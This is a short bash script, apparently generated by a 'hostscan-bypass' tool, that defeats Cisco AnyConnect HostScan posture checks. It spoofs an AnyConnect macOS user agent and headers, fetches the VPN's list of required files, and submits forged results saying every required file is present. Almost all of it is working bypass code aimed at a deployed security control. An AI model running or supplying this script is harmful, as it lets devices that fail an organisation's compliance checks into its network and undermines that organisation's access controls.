41 lines
1.1 KiB
Bash
Executable File
41 lines
1.1 KiB
Bash
Executable File
#!/bin/bash
|
|
# Initially generated by hostscan-bypass.go
|
|
#
|
|
# Github repo: https://github.com/Gilks/hostscan-bypass
|
|
# Blog post: https://gilks.github.io/post/cisco-hostscan-bypass
|
|
#
|
|
# You can find a list of hostscan requirements here:
|
|
# https://<VPN Page>/CACHE/sdesktop/data.xml
|
|
function run_curl
|
|
{
|
|
curl \
|
|
--insecure \
|
|
--user-agent "$useragent" \
|
|
--header "X-Transcend-Version: 1" \
|
|
--header "X-Aggregate-Auth: 1" \
|
|
--header "X-AnyConnect-Platform: $plat" \
|
|
--cookie "sdesktop=$token" \
|
|
--header "Accept: */*" \
|
|
--header "Accept-Encoding: identity" \
|
|
--header "Content-Type: text/xml" \
|
|
"$@"
|
|
}
|
|
set -e
|
|
host=https://$CSD_HOSTNAME
|
|
|
|
plat="mac-intel"
|
|
useragent="AnyConnect Darwin_i386 4.9.03047"
|
|
token=$CSD_TOKEN
|
|
|
|
payload=$(curl --insecure --user-agent "$useragent" \
|
|
"$host/CACHE/sdesktop/data.xml" | \
|
|
sed -n 's/.*File.,.\(.*\).,.\(.*\)[\/\\]\(.*\).".*/endpoint.file["\1"]={};\
|
|
endpoint.file["\1"].exists="true";\
|
|
endpoint.file["\1"].path="\2\3";\
|
|
endpoint.file["\1"].name="\3";\
|
|
/p')
|
|
|
|
run_curl --data-binary "$payload" "$host/+CSCOE+/sdesktop/scan.xml?reusebrowser=1"
|
|
exit 0
|
|
|